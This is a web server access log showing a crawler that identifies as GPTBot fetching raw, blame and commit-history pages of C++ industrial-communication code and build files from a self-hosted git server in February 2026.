git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:15:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:15:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:15:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 20012] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:15:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:15:56:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10481] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:15:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:15:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10478] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:15:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11207] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:15:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11210] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12793] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:15:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:15:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10184] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10947] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" +[17/Feb/2026:15:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11209] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10947] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" +[17/Feb/2026:15:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10183] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10185] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12302] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:15:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:15:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10184] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:15:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:15:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10185] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 20008] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:15:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:15:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:15:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 20008] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:15:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:15:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 11419] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" +[17/Feb/2026:15:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 10946] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" +[17/Feb/2026:15:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:15:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9952] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects?q=&sort=reversealphabetically&state=open" [Client 74.7.227.38] [Length 7806] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/projects" +[17/Feb/2026:15:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10317] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10318] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10315] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 